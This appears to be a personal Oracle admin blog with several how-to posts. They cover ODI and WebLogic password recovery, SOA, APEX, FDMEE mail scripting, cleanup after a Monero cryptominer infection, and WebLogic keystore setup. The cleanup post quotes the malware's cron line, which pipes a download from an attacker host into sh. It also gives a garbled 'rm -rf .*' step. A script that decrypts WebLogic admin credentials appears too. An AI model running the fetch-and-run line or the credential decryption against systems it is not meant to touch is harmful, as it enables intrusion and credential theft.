Change ODI Supervisor Account

Sometimes, you have several boxes and environments, and make a lot of configurations and we don't really keep tracking of all actions done until certain point of time. When you need that password you realize that you don't have it.

In ODI there's a user SUPERVISOR, who controls the master configuration of the tool.

If you want to change it please do the following:

1.- Log in with the master repo user

2.- Execute the following statement:

update snp_user set pass='aYyH5kyea2TN2.YuxopAMy'  

where wuser_name = 'SUPERVISOR'

Where pass is the new encoded password, encoded with the ODI utility encode.sh

Location:

/product/111/odi_111/odi_111/oracledi/agent/bin/encoded.sh newpassword

sh encode.sh newPassword

aYyH5kyea2TN2.YuxopAMy

and once again!,  easy no?

Get the Admin account password in Weblogic Systems

Recently I had the entrust to get the admin account password of weblogic, so after a little bit searching in oracle documentation and web I used the following code:

The steps:

1.- Build script get_password.py

from weblogic.security.internal import *
from weblogic.security.internal.encryption import *
encryptionService = SerializedSystemIni.getEncryptionService(".")
clearOrEncryptService = ClearOrEncryptedService(encryptionService)

# Take encrypt password from user
pwd = raw_input("Paste encrypted password ({AES}fk9EK...): ")

# Delete unnecessary escape characters
preppwd = pwd.replace("\\", "")

# Display password
print "Decrypted string is: " + clearOrEncryptService.decrypt(preppwd)

2.- Set the environmental variables

sh $DOMAIN_HOME/bin/setDomainEnv.sh | source $DOMAIN_HOME/bin/setDomainEnv.sh

3.- Get the username and password

grep username $DOMAIN_HOME/servers/AdminServer/security/boot.properties | sed -e "s/^username=\(.*\)/\1/"
|
grep password $DOMAIN_HOME/servers/AdminServer/security/boot.properties | sed -e "s/^password=\(.*\)/\1/"

4.- cd $DOMAIN_HOME/security

java weblogic.WLST get_password.py


bash-3.2$ java weblogic.WLST get_password.py

Initializing WebLogic Scripting Tool (WLST) ...

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands

Paste encrypted password ({AES}fk9EK...): (OR USERNAME)

Decrypted string is: admin


Voilá!

Resources:
https://blogs.oracle.com

Update:

If your environment doesn't recognize your wlst command do the following:

 sh /$ENV/fmw/product/111/soa_111/common/bin/wlst.sh get_password.py

You must be located in $DOMAIN_HOME/security.

Release Sequence Lock Mediator - SOA 11g

SOA 11g, Oracle Mediator Resequencer which guarantees to maintain the desired message sequence in a reliable and robust manner.

You can implement the resequencer in Mediator by just selecting from the drop down box like below.

Now, coming to the topic. How to release the lock if there is any, 

1. Normally these mediator would have been implemented with fault policies such as Manual Recovery. In that case go to EM console, navigate to Faults and Rejected Messages and enable "Show only recoverable faults". Click on "Recovery" icon and retry the instance.
2. If suppose there isn't any Error handling techniques, search for the faulted instances and abort it.
3. If nothing works, directly login to the Database with SOAINFRA schema. And use the below queries to  unlock the sequence.

Select *  from mediator_group_status where status!=0;

Update mediator_group_status set status=0 where status!=0;

Select *  from SCFS2O_SOAINFRA.mediator_group_status where status!=0;

Update SCFS2O_SOAINFRA.mediator_group_status set status=0 where status != 0;

Credits:

http://prabhasoablog.blogspot.mx/2016/02/how-to-release-sequence-lock-in-mediator.html

APEX 5.0 images not showing in different environment - Solution

Hi guys!

A few days ago, I migrated an APEX 5.0.4 application. In it I have used static files (used .png files to make some banners).
I wanted to test deployment to different environment - the same APEX version, exported the application using Export Utility (preserved app ID), imported in the other environment using Import ... and everything went smooth. Static files were imported also. But when I run the application they are not showing up.

I’ve searched in the net and I’ve found the next link:
https://chefdba.com/2016/03/23/validate-your-ords-installation/

Solutions.

1.      Using the .war file

Navigate to the location where you have the war file you used to install or upgrade the ORDS. You you should execute:

java -jar ords.war validate apex_database

Write user sys and password of your database.

2.      Manual Method.

You can extract the scripts from the war file. Navigate to validate/core from scripts directory and you you should execute as sysdba:

SQL> @ords_manual_validate.sql /u01/ords/log

NOTE: In case than you don’t have ords.war file, too can execute apex.war which located in Apex installation folder. 
you should execute:
java -jar apex.war validate apex_database

Write user sys and password of your database.

The images should now be displayed.

Regards!

Send E-mail FDMEE + Jython

Customer asked me to send e-mail with atachment to multiples receivers

The code I wrote:

#------------------------------------------------------------------------------
# Oracle Send Mail with Atachment
#-------------------------------------------------------------------------------
import smtplib
import mimetypes
import email
import email.mime.application
import java.lang as lang
import decimal


fdmAPI.logInfo("Custom Script: Inicia envio de Correo HFDM")

strMsg = email.mime.Multipart.MIMEMultipart()
strOutPath = fdmContext['OUTBOXDIR']+"/reports/"
strInMailPath = fdmContext['INBOXDIR']+"/BMB_LOC_EMAIL/"
strEmailInfo = strInMailPath+"RemitDest.txt"
fdmAPI.logInfo("strOutPath: " + strOutPath)
fdmAPI.logInfo("strInMailPath: " + strInMailPath)
fdmAPI.logInfo("strEmailInfo: " + strEmailInfo)
flag="true"


try:
allItems=[]
recipient=[]
allRecipients=[]
filemail = open(strEmailInfo, 'rb')
for row in filemail.readlines():
items = row.split(':')
for item in items:
fdmAPI.logInfo("ITEMS:"+item)
allItems.append(item)
strSender = allItems[1]
fdmAPI.logInfo("strSender: "+strSender)
recipientStr= allItems[3]
fdmAPI.logInfo("recipientStr: "+recipientStr)
recipients = recipientStr.split('|')
for recipient in recipients:
fdmAPI.logInfo("recipient:"+recipient)
allRecipients.append(recipient)

except Exception, e:
print "Error: unable to open mail file: " + str(e)
recipient=[]
recipient=allRecipients
strSubject = "FDMEE Mensaje de Prueba"
strReceivers = recipient if type(recipient) is list else [recipient]
strMsg['Subject'] =  strSubject
strMsg['From'] = strSender
strMsg['To'] = ", ".join(strReceivers)
fdmAPI.logInfo("strMsgTo: " + strMsg['To'])

loadid_s = str(fdmContext['LOADID'])
strFileName = loadid_s + ".pdf"
strRelativeFilePath = strOutPath + strFileName
strTxt = "Se ha generado el reporte <b>"+strFileName+"</b> de Financial Dara Management Enterprise Edition <br> para mas detalle consulte <a href='https://WORKSPACE_URL/workspace/index.jsp'>FDMEE</a><br><img src='http://www.oracle.com/us/assets/oraclelogo.jpg'>"

body = email.mime.Text.MIMEText(strTxt,'html')
strMsg.attach(body)

fp=open(strRelativeFilePath,'rb')
att = email.mime.application.MIMEApplication(fp.read(),_subtype="pdf")
fp.close()

att.add_header('Content-Disposition','attachment',filename=strFileName)
strMsg.attach(att)


try:
smtpServer = smtplib.SMTP('ORACLE_SMTPSERVER:25')
smtpServer.starttls()
smtpServer.sendmail(strSender, strReceivers, strMsg.as_string())
print "Successfully sent email"
smtpServer.quit()

except Exception, e:
print "Error: unable to send email: " + str(e)

Easy no?

Lady.B Malware! CryptoMiner

Recently I had a requirement to check the performance of a linux server.

A very strange job was starting over and over again no matter the times I killed it. This job was consuming a high percentage of cpu.

After a several commands for checking the origin of this job. I found the following A CryptoMiner malware infected the system.

The malware specializes in Mining relatively new cryptocurrency Monero (XMR). This is not only a new currency with a little difficulty, but the attackers for some reason chose it.

The malware checks the version of the system - and adds the appropriate executable file to AutoRun.

"stratum+tcp://monero.crypto-pool.fr:3333"

More detail here:

https://steemit.com/steemit/@whitemike313/crypto-miner-has-infected-thousands-of-nas-in-the-world

Well the steps I did to get rid of this malware:

1.- Stop all the communication to their servers.

sudo chkconfig iptables on

sudo iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
sudo iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
sudo iptables -A INPUT -s txrdr.com -j DROP
sudo iptables -A OUTPUT -d txrdr.com -j DROP

sudo service iptables save

sudo service iptables status


txrdr.com (this one, I found it in a cron file)

2.- Delete tmp files

/tmp/rm -rf .*
/tmp/rm -rf

3.- Delete oracle cron file
/var/spool/cron/oracle

Or remove its contents
In my case (*/1 * * * * curl txrdr.com/sitecontent/S6-WEB.jpg|sh;)

4.- Restart as many times as you required in order to see the process is not starting

5.- Check if you need to have cron running, otherwise stop it using /etc/init.d/crond stop.

This process is not going to clean completely the system but is going to block all the communications and avoid the cron job regenerates the source of the malware, thus the job is not going to start if the connection is not established succesfully.

Well done bad guys!!

Create keystores for Weblogic 12C

To create keys issue the following commands:

keytool -genkey -keyalg RSA -alias aliasdemo -keystore alias_identity.jks -dname "CN=CEN-BI-DS-ODI01, OU=alias_demo, O=alias_demo, L=Mexico, ST=Mexico, C=MX" -storepass passW0rd -validity 3600 -keysize 2048 -keypass passW0rd
keytool -selfcert -v -alias alias_demo -keypass passW0rd -keystore alias_demo_identity.jks -storepass passW0rd -storetype jks -validity 3600
keytool -export -v -alias alias_demo -file "alias_demo.gob.mx-rootCA.der" -keystore alias_demo_identity.jks -storepass passW0rd
keytool -import -v -trustcacerts -alias alias_demo -file "alias_demo.gob.mx-rootCA.der" -keystore alias_demo_trust.jks -storepass passW0rd

Steps to deploy them in weblogic server

• Identity Keystore: "/opt/oracle/keystore/alias_identity.jks"
• Trust Keystore: "/opt/oracle/keystore/alias_trust.jks"
• Alias: cenace
• Store Password: passW0rd
• Key Password: passW0rd
• Valid for: 3600 Days (Approx 10 Years)
• In the WebLogic Server Administration Console, click on "Servers" in the "Domain Structure" tree.
• Click on the managed server you wish to configure.
• Click on the "Configuration > Keystores" tab and sub-tab.
• If you are running on production mode, click the "Lock & Edit" Button.
• Click the "Change" button next to the "Keystores" setting.
• Select the "Custom Identity and Custom Trust" option and click the "Save" button.
• Enter the identity details. For example.
  
  
• Custom Identity Keystore: /home/oracle/keystore/alias_identity.jks
• Custom Identity Keystore Type: JKS
• Custom Identity Keystore Passphrase: passW0rd
• Confirm Custom Identity Keystore Passphrase: passW0rd
• Enter the trust information. For example.
  
  
• Custom Identity Keystore: /home/oracle/keystore/alias_trust.jks
• Custom Identity Keystore Type: JKS
• Custom Identity Keystore Passphrase: passW0rd
• Confirm Custom Identity Keystore Passphrase: passW0rd
• Click the "Save" button.
• Click the "SSL" tab.
• Enter the identity details. For example.
  
  
• Private Key Alias: aliasdemo
• Private Key Passphrase: passW0rd
• Confirm Private Key Passphrase: passW0rd
• Click the "Save" button.
• If you are running in production mode, click the "Activate Changes" button.

=)